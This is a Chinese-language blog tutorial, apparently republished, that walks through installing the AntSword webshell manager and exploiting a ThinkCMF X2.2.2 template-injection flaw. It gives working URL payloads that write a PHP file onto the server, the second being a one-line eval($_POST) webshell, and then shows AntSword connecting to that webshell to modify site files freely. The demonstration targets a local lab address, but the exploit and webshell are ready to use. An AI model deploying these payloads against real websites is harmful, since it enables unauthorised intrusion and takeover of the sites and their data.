一、蚁剑如何安装
蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得
蚁剑源码下载:https://github.com/AntSwordProject/antSword
蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader
下载之后解压缩之后是这样的
点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe
点击初始化
点击初始化点击选择antSword-2.0.3
antSword-2.0.3文件夹是代码(源码)的文件夹
之后再打开AntSword.exe
打开以后是这样的
二、构造payload上传文件
我这里使用的是ThinkCMF X2.2.2框架搭建的网站,等下用这个网站测试一下。
先用这句代码测试一下网站
点击回车
如果什么都没有显示说明上传成功.
分析一下上传的代码
?a=fetch&templateFile=public/index&prefix=''&content<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php> 这里我们主要看一下后半句
file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
file_put_contents 现在测试一下上传的代码是否能执行。
三、上传一句话木马文件
这里我构造的代码是
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('x.php','<?php @eval($_POST[a]); ?>')</php> 这里注意里面的a参数不要加单引号,因为前面有单引号,不然就闭合的单引号会报错。
这里的说一下后半句代码
file_put_contents(‘x.php’,’<?php @eval($_POST[a]); ?>’)
这里x.php是上传的文件名
<?php @eval($_POST[a]); ?>这一句@表示抑制错误,eval是执行函数,POST代表的是传参的意思
接下来上传代码
四、蚁剑连接
这里是网站首页地址加一个/后面跟着文件名
列如:http://192.168.36.35:8002/x.php
点击添加
点击文件管理
接下来就可以对网站里的文件随意改动。
从入门到入狱:网络安全法
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/231482.html原文链接:https://javaforall.net
